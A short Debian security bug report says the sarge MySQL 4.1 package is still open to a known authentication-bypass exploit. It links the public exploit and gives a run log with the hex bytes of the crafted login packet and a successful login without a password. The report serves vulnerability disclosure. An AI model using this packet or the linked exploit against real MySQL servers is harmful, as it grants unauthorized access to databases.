Package: mysql-server-4.1
Version: 4.1.11a-4sarge
Severity: important
Tags: security
http://www.milw0rm.com/exploits/311
With this exploit it's able to authenticate with the mysql server
without any password.
Log:
[EMAIL PROTECTED]:~$ ./mysql.pl perl *********
Using default MySQL port (3306)
Received greeting:
00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69
00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 C6
00000020 32 00 00 6F 7C 40 6B 79 3F 6E 2D 00 2C A2 08 02
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 54
00000040 2F 2E 39 73 58 3F 71 3F 25 37 00
Sending caps packet:
00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020 00 00 00 00 70 65 72 6C 00 14 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Received reply:
00000000 01 00 00 02 FE
Received OK reply, authentication successful!!
[EMAIL PROTECTED]:~$
It's an old exploit but the sargeversion is still exploitable.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
